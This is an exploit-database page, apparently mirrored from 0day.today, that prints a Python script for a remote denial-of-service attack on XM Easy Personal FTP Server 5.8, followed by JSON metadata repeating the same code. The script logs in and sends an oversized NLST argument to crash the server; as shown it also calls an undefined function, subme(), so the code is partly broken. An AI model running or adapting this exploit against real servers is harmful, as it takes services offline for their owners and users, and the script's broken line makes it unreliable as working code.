Search...

XM Easy Personal FTP 5.8 DoS

2009-10-02T00:00:00

ID 1337DAY-ID-9554
Type zdt
Reporter Platen
Modified 2009-10-02T00:00:00

Description

Exploit for unknown platform in category remote exploits

                                        
                                            ============================
XM Easy Personal FTP 5.8 DoS
============================


# Title: XM Easy Personal FTP 5.8 DoS
# CVE-ID: ()
# OSVDB-ID: ()
# Author: PLATEN
# Published: 2009-10-02
# Verified: yes


view source
print?
#!/usr/bin/python
print "\n###############################################################"
print "##                  Iranian Pentesters Home                  ##"
print "## XM Easy Personal FTP Server 5.8 Remote Denial Of Service  ##"
print "## http://www.dxm2008.com/data/ftpserversetup.exe            ##"
print "## author: PLATEN                                            ##"
print "############################################################### \n"
import socket
import sys
 
def Usage():
    print ("Usage: ./expl.py &lt;host&gt; &lt;Username&gt; &lt;password&gt;\n")
buffer= "./A" * 6300
subme()
def start(hostname, username, passwd):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("[-] Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] " + r
    sock.send("user %s\r\n" %username)
    r=sock.recv(1024)
    sock.send("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "[+] Send evil string"
    sock.send("nlst %s\r\n" %buffer)
    sock.close()
 
if len(sys.argv) &lt;&gt; 4:
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    start(hostname,username,passwd)
    sys.exit(0)



#  0day.today [2018-03-02]  #

JSON Vulners Source

Initial Source

{"published": "2009-10-02T00:00:00", "id": "1337DAY-ID-9554", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category remote exploits", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2018-03-02T23:33:35", "rev": 2}, "dependencies": {"references": [], "modified": "2018-03-02T23:33:35", "rev": 2}, "vulnersScore": -0.3}, "type": "zdt", "lastseen": "2018-03-02T23:33:35", "edition": 2, "title": "XM Easy Personal FTP 5.8 DoS", "href": "https://0day.today/exploit/description/9554", "modified": "2009-10-02T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "cvelist": [], "sourceHref": "https://0day.today/exploit/9554", "references": [], "reporter": "Platen", "sourceData": "============================\r\nXM Easy Personal FTP 5.8 DoS\r\n============================\r\n\r\n\r\n# Title: XM Easy Personal FTP 5.8 DoS\r\n# CVE-ID: ()\r\n# OSVDB-ID: ()\r\n# Author: PLATEN\r\n# Published: 2009-10-02\r\n# Verified: yes\r\n\r\n\r\nview source\r\nprint?\r\n#!/usr/bin/python\r\nprint \"\\n###############################################################\"\r\nprint \"## Iranian Pentesters Home ##\"\r\nprint \"## XM Easy Personal FTP Server 5.8 Remote Denial Of Service ##\"\r\nprint \"## http://www.dxm2008.com/data/ftpserversetup.exe ##\"\r\nprint \"## author: PLATEN ##\"\r\nprint \"############################################################### \\n\"\r\nimport socket\r\nimport sys\r\n \r\ndef Usage():\r\n print (\"Usage: ./expl.py <host> <Username> <password>\\n\")\r\nbuffer= \"./A\" * 6300\r\nsubme()\r\ndef start(hostname, username, passwd):\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect((hostname, 21))\r\n except:\r\n print (\"[-] Connection error!\")\r\n sys.exit(1)\r\n r=sock.recv(1024)\r\n print \"[+] \" + r\r\n sock.send(\"user %s\\r\\n\" %username)\r\n r=sock.recv(1024)\r\n sock.send(\"pass %s\\r\\n\" %passwd)\r\n r=sock.recv(1024)\r\n print \"[+] Send evil string\"\r\n sock.send(\"nlst %s\\r\\n\" %buffer)\r\n sock.close()\r\n \r\nif len(sys.argv) <> 4:\r\n Usage()\r\n sys.exit(1)\r\nelse:\r\n hostname=sys.argv[1]\r\n username=sys.argv[2]\r\n passwd=sys.argv[3]\r\n start(hostname,username,passwd)\r\n sys.exit(0)\r\n\r\n\r\n\n# 0day.today [2018-03-02] #", "immutableFields": []}